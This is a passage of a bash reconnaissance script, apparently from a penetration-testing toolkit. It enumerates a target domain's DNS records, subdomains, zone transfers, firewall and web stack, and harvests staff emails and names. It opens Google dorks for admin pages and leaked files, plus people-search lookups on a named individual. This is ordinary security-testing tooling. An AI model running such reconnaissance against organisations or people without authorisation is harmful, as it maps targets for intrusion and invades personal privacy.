# Capitalize the first letter of every word and tweak
cat tmp5 | sed 's/\b\(.\)/\u\1/g; s/ And / and /; s/ Av / AV /g; s/ It / IT /g; s/ Of / of /g; s/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g;
s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mci/McI/g; s/Mck/McK/g; s/Mcl/McL/g; s/Mcm/McM/g; s/Mcn/McN/g; s/Mcp/McP/g; s/Mcq/McQ/g;
s/Mcs/McS/g; s/ Ui / UI /g; s/ Ux / UX /g; s/,,/,/g' > tmp6
grep -v ',' tmp6 | awk '{print $2", "$1}' > tmp7
grep ',' tmp7 > tmp8
# Remove trailing whitespace from each line
cat tmp7 tmp8 | sed 's/[ \t]*$//' | sed '/^\,/ d' | sort -u > names
fi
##############################################################
echo
echo -n "Do you have a list of names to import? (y/N) "
echo "Example: last, first"
read answer
if [ "$answer" == "y" ]; then
f_location
echo "last_name#first_name#title" > /tmp/names.csv
cat $location | sed 's/, /#/; s/ /#/' | tr -s ' ' | tr -d '\t' | sed 's/;/#/g; s/#$//g' >> /tmp/names.csv
cat $discover/resource/recon-ng-import-names.rc > tmp.rc
fi
echo "recon-ng (37/$total)"
echo
echo "workspaces add $domain" > passive.rc
echo "add companies" >> passive.rc
echo "$companyurl" >> passive.rc
sed -i 's/%26/\&/g; s/%20/ /g; s/%2C/\,/g' passive.rc
echo "none" >> passive.rc
echo "add domains" >> passive.rc
echo "$domain" >> passive.rc
echo >> passive.rc
if [ -e tmp.rc ]; then
cat tmp.rc >> passive.rc
fi
if [ -e names ]; then
echo "last_name#first_name" > /tmp/names2.csv
sed 's/, /#/' names >> /tmp/names2.csv
cat $discover/resource/recon-ng-import-names2.rc >> passive.rc
echo >> passive.rc
fi
cat $discover/resource/recon-ng.rc >> passive.rc
sed -i "s/yyy/$domain/g" passive.rc
recon-ng --no-check -r $discover/passive.rc
##############################################################
grep '@' /tmp/emails | awk '{print $2}' | egrep -v '(>|SELECT)' | sort -u > emails-recon
cat emails emails-recon | tr '[A-Z]' '[a-z]' | sort -u > emails-final
sed '1,3d' /tmp/names | head -n -4 | sed 's/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g; s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mci/McI/g;
s/Mck/McK/g; s/Mcl/McL/g; s/Mcm/McM/g; s/Mcn/McN/g; s/Mcp/McP/g; s/Mcq/McQ/g; s/Mcs/McS/g' > names-recon
grep '/' /tmp/networks | grep -v 'Spooling' | awk '{print $2}' | $sip > networks-recon
grep "$domain" /tmp/subdomains | egrep -v '(\*|%|>|SELECT|www)' | awk '{print $2,$4}' | sed 's/|//g' | column -t | sort -u > sub-recon
cat /tmp/usernames | awk '{print $2}' | grep '[0-9]$' | sed 's/-/ /g' | awk '{print $2 ", " $1}' | sed '/[0-9]/d' | sed '/^,/d' | sed -e 's/\b\(.\)/\u\1/g' | sed 's/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g; s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mci/McI/g; s/Mck/McK/g; s/Mcl/McL/g;
s/Mcm/McM/g; s/Mcn/McN/g; s/Mcp/McP/g; s/Mcq/McQ/g; s/Mcs/McS/g' | sort -u > usernames-recon
##############################################################
cat networks-tmp networks-recon | sort -u | $sip > networks 2>/dev/null
# Find lines that contain IPs and clean up
cat sub* /tmp/sub-recon | grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | egrep -v '(outlook|www)' | column -t | sort -u > subdomains
awk '{print $2}' subdomains > tmp
grep -E '([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})' tmp | egrep -v '(-|=|:)' | sed '/^$/d' | $sip > hosts
if [ -e networks ]; then
cat networks > tmp 2>/dev/null
echo >> tmp
fi
cat hosts >> tmp 2>/dev/null
cat tmp >> $home/data/$domain/data/hosts.htm
echo "</pre>" >> $home/data/$domain/data/hosts.htm 2>/dev/null
##############################################################
echo "Summary" > zreport
echo $short >> zreport
echo > tmp
if [ -e emails-final ]; then
emailcount=$(wc -l emails-final | cut -d ' ' -f1)
echo "Emails $emailcount" >> zreport
echo "Emails ($emailcount)" >> tmp
echo $short >> tmp
cat emails-final >> tmp
echo >> tmp
cat emails-final >> $home/data/$domain/data/emails.htm
echo "</pre>" >> $home/data/$domain/data/emails.htm
else
echo "No data found." >> $home/data/$domain/data/emails.htm
echo "</pre>" >> $home/data/$domain/data/emails.htm
fi
if [ -e names-recon ]; then
namecount=$(wc -l names-recon | cut -d ' ' -f1)
echo "Names $namecount" >> zreport
echo "Names ($namecount)" >> tmp
echo $long >> tmp
cat names-recon >> tmp
echo >> tmp
cat names-recon >> $home/data/$domain/data/names.htm
echo "</pre>" >> $home/data/$domain/data/names.htm
else
echo "No data found." >> $home/data/$domain/data/names.htm
echo "</pre>" >> $home/data/$domain/data/names.htm
fi
if [ -s networks ]; then
networkcount=$(wc -l networks | cut -d ' ' -f1)
echo "Networks $networkcount" >> zreport
echo "Networks ($networkcount)" >> tmp
echo $short >> tmp
cat networks >> tmp
echo >> tmp
fi
if [ -e records ]; then
recordcount=$(wc -l records | cut -d ' ' -f1)
echo "DNS Records $recordcount" >> zreport
echo "DNS Records ($recordcount)" >> tmp
echo $long >> tmp
cat records >> tmp
echo >> tmp
fi
if [ -e hosts ]; then
hostcount=$(wc -l hosts | cut -d ' ' -f1)
echo "Hosts $hostcount" >> zreport
echo "Hosts ($hostcount)" >> tmp
echo $long >> tmp
cat hosts >> tmp
echo >> tmp
fi
if [ -s registered-domains ]; then
domaincount1=$(wc -l registered-domains | cut -d ' ' -f1)
echo "Registered Domains $domaincount1" >> zreport
echo "Registered Domains ($domaincount1)" >> tmp
echo $long >> tmp
cat registered-domains >> tmp
echo >> tmp
echo "Domains registered to $company using a corporate email." >> $home/data/$domain/data/registered-domains.htm
echo >> $home/data/$domain/data/registered-domains.htm
cat registered-domains >> $home/data/$domain/data/registered-domains.htm
echo "</pre>" >> $home/data/$domain/data/registered-domains.htm
else
echo "No data found." >> $home/data/$domain/data/registered-domains.htm
echo "</pre>" >> $home/data/$domain/data/registered-domains.htm
fi
if [ -e squatting ]; then
urlcount2=$(wc -l squatting | cut -d ' ' -f1)
echo "Squatting $urlcount2" >> zreport
echo "Squatting ($urlcount2)" >> tmp
echo $long >> tmp
cat squatting >> tmp
echo >> tmp
cat squatting >> $home/data/$domain/data/squatting.htm
echo "</pre>" >> $home/data/$domain/data/squatting.htm
else
echo "No data found." >> $home/data/$domain/data/squatting.htm
echo "</pre>" >> $home/data/$domain/data/squatting.htm
fi
if [ -e subdomains ]; then
urlcount=$(wc -l subdomains | cut -d ' ' -f1)
echo "Subdomains $urlcount" >> zreport
echo "Subdomains ($urlcount)" >> tmp
echo $long >> tmp
cat subdomains >> tmp
echo >> tmp
cat subdomains >> $home/data/$domain/data/subdomains.htm
echo "</pre>" >> $home/data/$domain/data/subdomains.htm
else
echo "No data found." >> $home/data/$domain/data/subdomains.htm
echo "</pre>" >> $home/data/$domain/data/subdomains.htm
fi
if [ -e xls ]; then
xlscount=$(wc -l xls | cut -d ' ' -f1)
echo "Excel $xlscount" >> zreport
echo "Excel Files ($xlscount)" >> tmp
echo $long >> tmp
cat xls >> tmp
echo >> tmp
cat xls >> $home/data/$domain/data/xls.htm
echo '</pre>' >> $home/data/$domain/data/xls.htm
else
echo "No data found." >> $home/data/$domain/data/xls.htm
fi
if [ -e pdf ]; then
pdfcount=$(wc -l pdf | cut -d ' ' -f1)
echo "PDF $pdfcount" >> zreport
echo "PDF Files ($pdfcount)" >> tmp
echo $long >> tmp
cat pdf >> tmp
echo >> tmp
cat pdf >> $home/data/$domain/data/pdf.htm
echo '</pre>' >> $home/data/$domain/data/pdf.htm
else
echo "No data found." >> $home/data/$domain/data/pdf.htm
fi
if [ -e ppt ]; then
pptcount=$(wc -l ppt | cut -d ' ' -f1)
echo "PowerPoint $pptcount" >> zreport
echo "PowerPoint Files ($pptcount)" >> tmp
echo $long >> tmp
cat ppt >> tmp
echo >> tmp
cat ppt >> $home/data/$domain/data/ppt.htm
echo '</pre>' >> $home/data/$domain/data/ppt.htm
else
echo "No data found." >> $home/data/$domain/data/ppt.htm
fi
if [ -e txt ]; then
txtcount=$(wc -l txt | cut -d ' ' -f1)
echo "Text $txtcount" >> zreport
echo "Text Files ($txtcount)" >> tmp
echo $long >> tmp
cat txt >> tmp
echo >> tmp
cat txt >> $home/data/$domain/data/txt.htm
echo '</pre>' >> $home/data/$domain/data/txt.htm
else
echo "No data found." >> $home/data/$domain/data/txt.htm
fi
if [ -e doc ]; then
doccount=$(wc -l doc | cut -d ' ' -f1)
echo "Word $doccount" >> zreport
echo "Word Files ($doccount)" >> tmp
echo $long >> tmp
cat doc >> tmp
echo >> tmp
cat doc >> $home/data/$domain/data/doc.htm
echo '</pre>' >> $home/data/$domain/data/doc.htm
else
echo "No data found." >> $home/data/$domain/data/doc.htm
fi
cat tmp >> zreport
if [ -e whois-domain ]; then
echo "Whois Domain" >> zreport
echo $long >> zreport
cat whois-domain >> zreport
cat whois-domain >> $home/data/$domain/data/whois-domain.htm
echo "</pre>" >> $home/data/$domain/data/whois-domain.htm
else
echo "No data found." >> $home/data/$domain/data/whois-domain.htm
echo "</pre>" >> $home/data/$domain/data/whois-domain.htm
fi
if [ -e whois-ip ]; then
echo >> zreport
echo "Whois IP" >> zreport
echo $long >> zreport
cat whois-ip >> zreport
cat whois-ip >> $home/data/$domain/data/whois-ip.htm
echo "</pre>" >> $home/data/$domain/data/whois-ip.htm
else
echo "No data found." >> $home/data/$domain/data/whois-ip.htm
echo "</pre>" >> $home/data/$domain/data/whois-ip.htm
fi
cat zreport >> $home/data/$domain/data/passive-recon.htm
echo "</pre>" >> $home/data/$domain/data/passive-recon.htm
rm tmp* zreport
mv curl debug* email* hosts name* network* records registered* squatting sub* usernames-recon whois* z* doc pdf ppt txt xls $home/data/$domain/tools/ 2>/dev/null
mv passive.rc $home/data/$domain/tools/recon-ng/
cd /tmp/; mv emails names* networks subdomains usernames $home/data/$domain/tools/recon-ng/ 2>/dev/null
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The supporting data folder is located at ${YELLOW}$home/data/$domain/${NC}\n"
echo
read -p "Press <return> to continue."
##############################################################
f_runlocally
$web &
sleep 4
$web https://www.google.com/search?site=\&tbm=isch\&source=hp\&q=$companyurl%2Blogo &
sleep 2
$web https://www.google.com/#q=site%3A$domain+inurl:admin &
sleep 2
$web https://www.google.com/#q=site%3A$domain+inurl:login &
sleep 2
$web https://www.google.com/#q=site%3A$domain+%22index+of/%22+%22parent+directory%22 &
sleep 2
$web https://www.google.com/#q=site%3A$domain+%22internal+use+only%22 &
sleep 2
$web https://www.google.com/#q=site%3Apastebin.com+intext:%40$domain &
sleep 2
$web https://$companyurl.s3.amazonaws.com &
sleep 2
$web http://api.hackertarget.com/pagelinks/?q=$domain &
sleep 2
$web https://dockets.justia.com/search?parties=%22$companyurl%22&cases=mostrecent &
sleep 2
$web http://www.reuters.com/finance/stocks/lookup?searchType=any\&search=$companyurl &
sleep 2
$web https://www.sec.gov/cgi-bin/browse-edgar?company=$companyurl\&owner=exclude\&action=getcompany &
sleep 2
$web https://www.ssllabs.com/ssltest/analyze.html?d=$domain\&hideResults=on\&latest &
sleep 2
$web $home/data/$domain/index.htm &
echo
echo
exit
;;
2)
clear
f_banner
echo -e "${BLUE}Uses dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng.${NC}"
echo
echo $medium
echo
echo "Usage: target.com"
echo
echo -n "Domain: "
read domain
# Check for no answer
if [[ -z $domain ]]; then
f_error
fi
# If folder doesn't exist, create it
if [ ! -d $home/data/$domain ]; then
cp -R $discover/report/ $home/data/$domain
sed 's/REPLACEDOMAIN/'$domain'/g' $home/data/$domain/index.htm > tmp
mv tmp $home/data/$domain/index.htm
fi
# Number of tests
total=9
companyurl=$( printf "%s\n" "$company" | sed 's/ /%20/g; s/\&/%26/g; s/\,/%2C/g' )
echo
echo $medium
echo
echo "dnsrecon"
echo " DNS Records (1/$total)"
dnsrecon -d $domain -t std > tmp
egrep -v '(All queries|Bind Version|Could not|Enumerating SRV|not configured|Performing|Records Found|Recursion|resolving|Resolving|TXT|Wildcard)' tmp | sort > tmp2
# Remove first 6 characters from each line
sed 's/^......//g' tmp2 | column -t | sort > tmp3
grep 'TXT' tmp | sed 's/^......//g' | sort > tmp4
cat tmp3 tmp4 | column -t > records
cp $discover/report/data/records.htm $home/data/$domain/data/records.htm
cat records >> $home/data/$domain/data/records.htm
echo "</pre>" >> $home/data/$domain/data/records.htm
rm tmp*
echo " Sub-domains (2/$total)"
if [ -f /usr/share/dnsrecon/namelist.txt ]; then
dnsrecon -d $domain -D /usr/share/dnsrecon/namelist.txt -f -t brt > tmp
fi
# PTF
if [ -f /pentest/intelligence-gathering/dnsrecon/namelist.txt ]; then
dnsrecon -d $domain -D /pentest/intelligence-gathering/dnsrecon/namelist.txt -f -t brt > tmp
fi
grep $domain tmp | grep -v "$domain\." | egrep -v '(Performing|Records Found)' | sed 's/\[\*\] //g; s/^[ \t]*//' | awk '{print $2,$3}' | column -t | sort -u > sub-dnsrecon
egrep -v '(\[|.nat.|1.1.1.1|6.9.6.9|127.0.0.1)' sub-dnsrecon | tr '[A-Z]' '[a-z]' | column -t | sort -u | awk '$2 !~ /[a-z]/' > subdomains
############################################################
if [ -e $home/data/$domain/data/subdomains.htm ]; then
cat $home/data/$domain/data/subdomains.htm subdomains | grep -v "<" | grep -v "$domain\." | column -t | sort -u > subdomains-combined
cp $discover/report/data/subdomains.htm $home/data/$domain/data/subdomains.htm
cat subdomains-combined >> $home/data/$domain/data/subdomains.htm
echo "</pre>" >> $home/data/$domain/data/subdomains.htm
fi
awk '{print $3}' records > tmp
awk '{print $2}' sub-dnsrecon >> tmp
grep -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' tmp | egrep -v '(-|=|:|1.1.1.1|6.9.6.9|127.0.0.1)' | $sip > hosts
echo " Zone Transfer (3/$total)"
dnsrecon -d $domain -t axfr > tmp
egrep -v '(Checking for|filtered|No answer|NS Servers|Removing|TCP Open|Testing NS)' tmp | sed 's/^....//g; /^$/d' > zonetransfer
echo
echo "Web Application Firewall (4/$total)"
wafw00f -a http://www.$domain > tmp 2>/dev/null
egrep -v '(By Sandro|Checking http://www.|Generic Detection|requests|WAFW00F)' tmp | sed "s/ http:\/\/www.$domain//g" | egrep -v "(\_|\^|\||<|')" | sed '1,4d' > waf
echo
echo "Traceroute"
echo " UDP (5/$total)"
echo "UDP" > tmp
traceroute $domain | awk -F" " '{print $1,$2,$3}' >> tmp
echo >> tmp
echo "ICMP ECHO" >> tmp
echo " ICMP ECHO (6/$total)"
traceroute -I $domain | awk -F" " '{print $1,$2,$3}' >> tmp
echo >> tmp
echo "TCP SYN" >> tmp
echo " TCP SYN (7/$total)"
traceroute -T $domain | awk -F" " '{print $1,$2,$3}' >> tmp
grep -v 'traceroute' tmp > tmp2
# Remove blank lines from end of file
awk '/^[[:space:]]*$/{p++;next} {for(i=0;i<p;i++){printf "\n"}; p=0; print}' tmp2 > ztraceroute
echo
echo "Whatweb (~5 min) (8/$total)"
grep -v '<' $home/data/$domain/data/subdomains.htm | awk '{print $1}' > tmp
whatweb -i tmp --color=never --no-errors > tmp2 2>/dev/null
# Find lines that start with http, and insert a line after
sort tmp2 | sed '/^http/a\ ' > tmp3
# Cleanup
cat tmp3 | sed 's/,/\n/g; s/\[200 OK\]/\n\[200 OK\]\n/g; s/\[301 Moved Permanently\]/\n\[301 Moved Permanently\]\n/g; s/\[302 Found\]/\n\[302 Found\]\n/g; s/\[404 Not Found\]/\n\[404 Not Found\]\n/g' | egrep -v '(Unassigned|UNITED STATES)' | sed 's/^[ \t]*//' | cat -s | more > whatweb
grep '@' whatweb | sed 's/Email//g; s/\[//g; s/\]//g' | tr '[A-Z]' '[a-z]' | grep "@$domain" | grep -v 'hosting' | cut -d ' ' -f2 | sort -u > emails
rm tmp*
# Remove all empty files
find $home/data/$domain/ -type f -empty -exec rm {} +
echo
echo "recon-ng (9/$total)"
cp $discover/resource/recon-ng-active.rc active.rc
sed -i "s/xxx/$companyurl/g" active.rc
sed -i 's/%26/\&/g; s/%20/ /g; s/%2C/\,/g' active.rc
sed -i "s/yyy/$domain/g" active.rc
recon-ng --no-check -r $discover/active.rc
##############################################################
echo "Summary" > zreport
echo $short >> zreport
echo > tmp
if [ -e emails ]; then
emailcount=$(wc -l emails | cut -d ' ' -f1)
echo "Emails $emailcount" >> zreport
echo "Emails ($emailcount)" >> tmp
echo $short >> tmp
cat emails >> tmp
echo >> tmp
fi
if [ -e hosts ]; then
hostcount=$(wc -l hosts | cut -d ' ' -f1)
echo "Hosts $hostcount" >> zreport
echo "Hosts ($hostcount)" >> tmp
echo $short >> tmp
cat hosts >> tmp
echo >> tmp
fi
if [ -e records ]; then
recordcount=$(wc -l records | cut -d ' ' -f1)
echo "DNS Records $recordcount" >> zreport
echo "DNS Records ($recordcount)" >> tmp
echo $long >> tmp
cat records >> tmp
echo >> tmp
fi
if [ -e subdomains ]; then
subdomaincount=$(wc -l subdomains | cut -d ' ' -f1)
echo "Subdomains $subdomaincount" >> zreport
echo "Subdomains ($subdomaincount)" >> tmp
echo $long >> tmp
cat subdomains >> tmp
echo >> tmp
fi
cat tmp >> zreport
echo "Web Application Firewall" >> zreport
echo $long >> zreport
cat waf >> zreport
echo >> zreport
echo "Traceroute" >> zreport
echo $long >> zreport
cat ztraceroute >> zreport
echo >> zreport
echo "Zone Transfer" >> zreport
echo $long >> zreport
cat zonetransfer >> zreport
echo >> zreport
echo "Whatweb" >> zreport
echo $long >> zreport
cat whatweb >> zreport
cat zreport >> $home/data/$domain/data/active-recon.htm
echo "</pre>" >> $home/data/$domain/data/active-recon.htm
cat ztraceroute >> $home/data/$domain/data/traceroute.htm
echo "</pre>" >> $home/data/$domain/data/traceroute.htm
cat waf >> $home/data/$domain/data/waf.htm
echo "</pre>" >> $home/data/$domain/data/waf.htm
cat whatweb >> $home/data/$domain/data/whatweb.htm
echo "</pre>" >> $home/data/$domain/data/whatweb.htm
cat zonetransfer >> $home/data/$domain/data/zonetransfer.htm
echo "</pre>" >> $home/data/$domain/data/zonetransfer.htm
if [[ -e $home/data/$domain/data/emails.htm && -e emails ]]; then
cat $home/data/$domain/data/emails.htm emails | grep -v '<' | sort -u > tmp-new-emails
cat $home/data/$domain/data/emails.htm | grep '<' > tmp-new-page
mv tmp-new-page $home/data/$domain/data/emails.htm
cat tmp-new-email >> $home/data/$domain/data/emails.htm
echo "</pre>" >> $home/data/$domain/data/emails.htm
fi
if [[ -e $home/data/$domain/data/hosts.htm && -e hosts ]]; then
cat $home/data/$domain/data/hosts.htm hosts | grep -v '<' | $sip > tmp-new-hosts
cat $home/data/$domain/data/hosts.htm | grep '<' > tmp-new-page
mv tmp-new-page $home/data/$domain/data/hosts.htm
cat tmp-new-hosts >> $home/data/$domain/data/hosts.htm
echo "</pre>" >> $home/data/$domain/data/hosts.htm
fi
mv active.rc emails hosts record* sub* waf whatweb z* /tmp/subdomains $home/data/$domain/tools/active/ 2>/dev/null
rm tmp*
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The supporting data folder is located at ${YELLOW}$home/data/$domain/${NC}\n"
echo
echo
$web $home/data/$domain/index.htm &
exit
;;
3)
clear
f_banner
echo -e "${BLUE}Import names into an existing recon-ng workspace.${NC}"
echo
echo "Example: last, first"
f_location
echo "last_name#first_name" > /tmp/names.csv
sed 's/, /#/' $location >> /tmp/names.csv
echo -n "Use Workspace: "
read -e workspace
# Check for no answer
if [[ -z $workspace ]]; then
f_error
fi
# Check for wrong answer
if [ ! -d /root/.recon-ng/workspaces/$workspace ]; then
f_error
fi
echo "workspaces select $workspace" > tmp.rc
echo >> tmp.rc
cat $discover/resource/recon-ng-import-names.rc >> tmp.rc
echo >> tmp.rc
echo "query DELETE FROM contacts WHERE rowid NOT IN (SELECT min(rowid) FROM contacts GROUP BY first_name, last_name, email)" >> tmp.rc
echo >> tmp.rc
echo "spool start /tmp/names" >> tmp.rc
echo "query SELECT DISTINCT last_name,first_name,title FROM contacts WHERE first_name OR last_name IS NOT NULL ORDER BY last_name,first_name ASC" >> tmp.rc
echo "spool stop" >> tmp.rc
echo "exit" >> tmp.rc
recon-ng --no-check -r $discover/tmp.rc
sed '1,3d' /tmp/names | head -n -4 > $home/data/$workspace-names.txt
rm tmp.rc /tmp/names*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/$workspace-names.txt${NC}\n"
echo
echo
exit
;;
4) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_person(){
f_runlocally
clear
f_banner
echo -e "${BLUE}RECON${NC}"
echo
echo -n "First name: "
read firstName
# Check for no answer
if [[ -z $firstName ]]; then
f_error
fi
echo -n "Last name: "
read lastName
# Check for no answer
if [[ -z $lastName ]]; then
f_error
fi
$web &
sleep 2
$web http://www.411.com/name/$firstName-$lastName/ &
sleep 2
uripath="http://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${firstName}&mi=&ln=${lastName}&age=&city=&state="
$web $uripath &
sleep 2
$web https://www.linkedin.com/pub/dir/?first=$firstName\&last=$lastName\&search=Search &
sleep 2
$web http://www.peekyou.com/$firstName%5f$lastName &
sleep 2
$web http://phonenumbers.addresses.com/people/$firstName+$lastName &
sleep 2
$web https://pipl.com/search/?q=$firstName+$lastName\&l=\&sloc=\&in=5 &
sleep 2
$web http://www.spokeo.com/$firstName-$lastName &
sleep 2
$web https://twitter.com/search?q=%22$firstName%20$lastName%22&src=typd &
sleep 2
$web https://www.youtube.com/results?search_query=$firstName+$lastName &
sleep 2
$web http://www.zabasearch.com/query1_zaba.php?sname=$firstName%20$lastName&state=ALL&ref=$ref&se=$se&doby=&city=&name_style=1&tm=&tmr= &
f_main
}
##############################################################################################################
f_salesforce(){
clear
f_banner
echo -e "${BLUE}Create a free account at salesforce (https://connect.data.com/login).${NC}"
echo -e "${BLUE}Perform a search on your target > select the company name > see all.${NC}"
echo -e "${BLUE}Copy the results into a new file.${NC}"
echo -e "${BLUE}[*] Note: each record should be on a single line.${NC}"
f_location
echo
# Remove blank lines, strings, and leading white space. Set tab as the delimiter
cat $location | sed '/^$/d; s/Direct Dial Available//g; s/[] //g; s/^[ \t]*//; s/ \+ /\t/g' > tmp
# Place names into a file and sort by uniq
cut -d $'\t' -f1 tmp | sort -u > tmp2
# grep name, sort by data field, then uniq by the name field - selecting the most recent entry
# select and and title from result and colon delimit into file
while read line; do
grep "$line" tmp | sort -t ',' -k7M | sort -uk1,1r | awk -F$'\t' '{print $1":"$3}' | sed 's/ :/:/g' >> tmp3
done < tmp2
column -s ':' -t tmp3 > tmp4
# Clean-up
cat tmp4 | sed 's/ -- /, /g; s/ - /, /g; s/,,/,/g; s/, ,/, /g; s/\//, /g; s/[^ ]\+/\L\u&/g; s/-.*$//g; s/1.*$//g; s/1/I/g; s/2/II/g; s/3/III/g; s/4/IV/g;
s/5/V/g; s/2cfinancedistributionoperations//g; s/-administration/, Administration/g; s/-air/, Air/g; s/, , and$//g; s/ And / and /g; s/ at.*$//g;
s/ asic / ASIC /g; s/ Asm/ ASM/g; ; s/ api / API /g; s/AssistantChiefPatrolAgent/Assistant Chief Patrol Agent/g; s/-associate/-associate/g; s/ at .*//g;
s/ At / at /g; s/ atm / ATM /g; s/ bd / BD /g; s/-big/, Big/g; s/BIIb/B2B/g; s/-board/, Board/g; s/-boiler/, Boiler/g; s/ bsc / BSC /g; s/-call/, Call/g;
s/-capacity/, Capacity/g; s/-cash/, Cash/g; s/ cbt / CBT /g; s/ Cc/ CC/g; s/-chief/, Chief/g; s/ cip / CIP /g; s/ cissp / CISSP /g; s/-civil/, Civil/g;
s/ cj / CJ /g; s/Clients//g; s/ cmms / CMMS /g; s/ cms / CMS /g; s/-commercial/, Commercial/g;
s/CommitteemanagementOfficer/Committee Management Officer/g; s/-communications/, Communications/g; s/-community/, Community/g;
s/-compliance/, Compliance/g; s/-consumer/, Consumer/g; s/contact sold, to//g; s/-corporate/, Corporate/g; s/ cpa/ CPA/g; s/-creative/, Creative/g;
s/ Crm / CRM /g; s/ Csa/ CSA/g; s/ Csc/ CSC/g; s/ctr /Center/g; s/-customer/, Customer/g; s/Datapower/DataPower/g; s/-data/, Data/g; s/ db2 / DB2 /g;
s/ dbii / DB2 /g; s/ Dc/ DC/g; s/DDesigner/Designer/g; s/DesignatedFederalOfficial/Designated Federal Official/g; s/-design/, Design/g; s/dhs/DHS/g;
s/-digital/, Digital/g; s/-distribution/, Distribution/g; s/ Disa / DISA /g; s/ dns / DNS /g; s/-dominion/-dominion/g; s/-drilling/, Drilling/g;
s/ dvp / DVP /g; s/ ebs / EBS /g; s/ Edi / EDI /g; s/editorr/Editor/g; s/ edrm / EDRM /g; s/ eeo / EEO /g; s/ efi / EFI /g; s/-electric/, Electric/g;
s/EleCenterEngineer/Electric Engineer/g; s/ emc / EMC /g; s/ emea/ EMEA/g; s/-employee/, Employee/g; s/ ems / EMS /g; s/-energy/, Energy/g;
s/engineer5/Engineer V/g; s/-engineering/, Engineering/g; s/-engineer/, Engineer/g; s/-environmental/, Environmental/g; s/-executive/, Executive/g;
s/faa / FAA /g; s/-facilities/, Facilities/g; s/ Fdr / FDR /g; s/ ferc / FERC /g; s/ fha / FHA /g; s/-finance/, Finance/g; s/-financial/, Financial/g;
s/-fleet/, Fleet/g; s/ For / for /g; s/ fsa / FSA /g; s/ fso / FSO /g; s/ fx / FX /g; s/ gaap / GAAP /g; s/-gas/, Gas/g; s/-general/, General/g;
s/-generation/, Generation/g; s/grp/Group/g; s/ gsa / GSA /g; s/ gsis / GSIS /g; s/ gsm / GSM /g; s/Hbss/HBSS/g; s/ hd / HD /g; s/ hiv / HIV /g;
s/ hmrc / HMRC /g; s/ hp / HP /g; s/ hq / HQ /g; s/ hris / HRIS /g; s/-human/, Human/g; s/ hvac / HVAC /g; s/ ia / IA /g; s/ id / ID /g; s/ iii/ III/g;
s/ Ii/ II/g; s/ Iis / IIS /g; s/ In / in /g; s/-industrial/, Industrial/g; s/information technology/IT/g; s/-information/, Information/g;
s/-infrastructure/, Infrastructure/g; s/-instrumentation/, Instrumentation/g; s/-internal/, Internal/g; s/ ip / IP /g; s/ ir / IR /g; s/ Issm/ ISSM/;
s/itenterpriseprojectmanager/IT Enterprise Project Manager/g; s/-IT/, IT/g; s/ iv / IV /g; s/ Iv,/ IV,/g; s/Jboss/JBoss/g; s/ jc / JC /g; s/ jd / JD /g;
s/ jt / JT /g; s/konsult, konsultchef, projektledare/Consultant/g; s/laboratorynetwork/Laboratory, Network/g; s/-labor/, Labor/g;
s/lan administrator/LAN Administrator/g; s/lan admin/LAN Admin/g; s/-land/, Land/g; s/-licensing/, Licensing/g; s/LawIII60/Law360/g; s/ llc / LLC. /g;
s/-logistics/, Logistics/g; s/ Lp/ LP/g; s/lvl/Level/g; s/-mail/, Mail/g; s/-manager/, Manager/g; s/-marketing/, Marketing/g; s/-materials/, Materials/g;
s/ mba / MBA /g; s/Mca/McA/g; s/Mcb/McB/g; s/Mcc/McC/g; s/Mcd/McD/g; s/Mce/McE/g; s/Mcf/McF/g; s/Mcg/McG/g; s/Mch/McH/g; s/Mci/McI/g; s/Mcj/McJ/g;
s/Mck/McK/g; s/Mcl/McL/g; s/Mcm/McM/g; s/Mcn/McN/g; s/Mcq/McQ/g; s/Mcv/McV/g; s/mcse/MCSE/g; s/-mechanical/, Mechanical/g; s/-metals/, Metals/g;
s/-metro/, Metro/g; s/, mp//g; s/ nerc / NERC /g; s/mcp/McP/g; s/mcq/McQ/g; s/mcs/McS/g; s/-media/, Media/g;
s/-mergers/,Mergers/g; s/-millstone/, Millstone/g; s/-motor/, Motor/g; s/ mssp / MSSP /g; s/-networking/, Networking/g; s/-network/, Network/g;
s/-new/, New/g; s/-north/, North/g; s/not in it//g; s/ nso / NSO /g; s/-nuclear/, Nuclear/g; s/ Nz / NZ /g; s/ oem / OEM /g; s/-office/, Office/g;
s/ Of / of /g; s/-operations/, Operations/g; s/-oracle/, Oracle/g; s/-other/, Other/g; s/ pca / PCA /g; s/ pcs / PCS /g; s/ pc / PC /g; s/ pdm / PDM /g;
s/ phd / PhD /g; s/ pj / PJ /g; s/-plant/, Plant/g; s/plt/Plant/g; s/pmo/PMO/g; s/Pmp/PMP/g; s/ pm / PM /g; s/ Pm / PM /g; s/-power/, Power/g;
s/-property/, Property/g; s/-public/, Public/g; s/ Psa/ PSA/g; s/pyble/Payble/g; s/ os / OS /g; s/r&d/R&D/g; s/ r and d /R&D/g; s/-records/, Records/g;
s/-regulated/, Regulated/g; s/-regulatory/, Regulatory/g; s/-related/, Related/g; s/-remittance/, Remittance/g; s/-renewals/, Renewals/g;
s/-revenue/, Revenue/g; s/ rfid / RFID /g; s/ rfp / RFP /g; s/ rf / RF /g; s/ Roip / RoIP /g; s/Rtls/RTLS/g; s/ Rtm/ RTM/g; s/saas/SaaS/g;
s/-safety/, Safety/g; s/san manager/SAN Manager/g; s/scada/SCADA/g; s/sdlc/SDLC/g; s/setac-/SETAC,/g; s/sftwr/Software/g; s/-short/, Short/g;
s/ smb / SMB /g; s/sms/SMS/g; s/smtp/SMTP/g; s/snr/Senior/g; s/.specialist./ Specialist /g; s/ Soc / SOC /g; s/sql/SQL/g; s/spvr/Supervisor/g;
